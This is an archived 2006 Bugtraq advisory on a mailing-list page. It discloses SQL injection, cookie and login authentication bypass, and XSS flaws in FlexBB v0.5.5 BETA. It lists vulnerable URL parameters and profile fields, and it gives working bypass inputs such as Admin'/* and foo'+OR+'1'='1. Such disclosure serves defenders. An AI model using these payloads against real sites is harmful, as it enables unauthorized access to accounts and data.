| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 16 Apr 2006 16:07:15 -0000 From: kr4ch@....de To: bugtraq@...urityfocus.com Subject: FlexBB v0.5.5 BETA [SQL Inj] [XSS] [Login bypass] App: FlexBB v0.5.5 BETA Advistory by: p0w3r - curse-crew.de SQL Inj: magic_quotes_gpc = off /index.php?page=showprofile&id=1'[SQL]/* /index.php?page=forums&forumid=1'[SQL]/* /index.php?page=viewthread&threadid=1'[SQL]/* /index.php?page=editpost&threadid=1'[SQL]/* Login bypass: magic_quotes_gpc = off Nick: Admin'/* PW: foo PW Hash in "flexbb_password" Cookie Login bypass[Cookie]: magic_quotes_gpc = off flexbb_username: Admin flexbb_password: foo'+OR+'1'='1 loggedin: TRUE XSS: "User CP"->"Edit Profile" ICQ: [XSS] & '[SQL]/* AIM: [XSS] & '[SQL]/* MSN: [XSS] & '[SQL]/* Google Talk: [XSS] & '[SQL]/* Website Name: [XSS] & '[SQL]/* Website Address: [XSS] & '[SQL]/* Email Address: [XSS] & '[SQL]/* Location: [XSS] & '[SQL]/* Signature: [XSS] & '[SQL]/* Sub-Titles: [XSS] & '[SQL]/*
Powered by blists - more mailing lists